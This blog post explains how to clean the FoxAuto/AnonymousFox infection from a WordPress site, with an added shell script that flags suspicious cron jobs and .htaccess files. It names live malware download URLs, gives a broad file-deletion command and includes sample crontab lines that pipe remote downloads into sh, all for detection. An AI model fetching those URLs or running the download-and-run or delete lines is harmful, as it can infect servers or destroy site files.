🔴 FoxAuto WordPress malware

The AnonymousFox Hack guide by Sucuri misses a huge step in cleaning a hacked WordPress website, and that step is removing the cronjobs.

While removing AnonymousFox malware from a website I noticed the following cron:


It downloads a script from http://hello.hahaha666.xyz/xxxd and runs it. The script is:


It creates a new folder css and replaces the index.php file with http://hello.hahaha666.xyz/wp-class.txt


source code:

This file then modifies the default .htaccess and creates a .htaccess file inside every directory. These .htaccess files can be found by using the command:

grep -r "Deny from all" *

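To remove all these .htaccess files (the pattern matches every file with htaccess in its name under the current directory, including the site's legitimate root .htaccess, so run it without -delete first to review the list):

find . -type f -name '*htaccess*' -delete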

As mentioned at the beginning of the post, checking and removing cronjobs is necessary when cleaning up hacked WordPress websites, and I hope that Sucuri will eventually include it in their “fix FoxAuto WordPress malware” guide.
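
As an added example (not code from the original post or from Sucuri), the read-only shell helpers below flag crontab lines that download something and hand it to an interpreter, which is the behaviour described for the cron above, and list .htaccess files containing "Deny from all" for review before anything is deleted. The function names, the file name triage.sh and the sample cron lines are constructed for illustration.

```sh
#!/bin/sh
# Added example: read-only triage helpers. Nothing here edits or deletes files.

# Print crontab lines (stdin) that call curl/wget AND pass control to an
# interpreter via a pipe, ';' or '&&' (download-and-run). Comments are skipped.
suspicious_cron_lines() {
  grep -vE '^[[:space:]]*(#|$)' \
    | grep -E '(^|[[:space:]/])(curl|wget)[[:space:]]' \
    | grep -E '(\||;|&&)[[:space:]]*([^[:space:]]*/)?(sh|bash|dash|php|perl|python[0-9.]*)([[:space:]]|$)' \
    || true
}

# List .htaccess files under directory $1 (default: .) that contain
# "Deny from all", so they can be reviewed before anything is removed.
htaccess_deny_files() {
  find "${1:-.}" -type f -name '.htaccess' \
    -exec grep -lis 'deny from all' {} + || true
}

# Constructed sample crontab (example.invalid is a reserved, non-resolving name).
sample_crontab() {
  cat <<'EOF'
# m h dom mon dow command
*/10 * * * * curl -s http://example.invalid/x | sh
0 3 * * * wget -q -O /tmp/.u http://example.invalid/u && sh /tmp/.u
*/15 * * * * wget -q -O - https://example.invalid/wp-cron.php?doing_wp_cron >/dev/null 2>&1
*/5 * * * * /usr/bin/php /home/user/public_html/wp-cron.php
EOF
}

# Usage: sh triage.sh --audit [webroot]   (triage.sh is a hypothetical file name)
if [ "${1:-}" = "--audit" ]; then
  echo "== cron entries that download and run code =="
  crontab -l 2>/dev/null | suspicious_cron_lines
  echo "== .htaccess files containing 'Deny from all' =="
  htaccess_deny_files "${2:-.}"
fi
```

The two legitimate wp-cron entries in the sample are not flagged, because neither combines a download with an interpreter call; only the current user's crontab is read, so repeat the check for every account that owns site files.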


2 thoughts on “🔴 FoxAuto WordPress malware”

  1. Hello,
    the command is used from the terminal (SSH), if you are using cPanel, look for “Terminal” icon:

    then enter the folder where your website is located, example: cd public_html where cd means enter and public_html is the directory name.

    and use grep -r "Deny from all" * to find all .htaccess files that are blocking access:


    If you are not using cPanel or don’t see the “Terminal” icon, ask your hosting provider for SSH access.

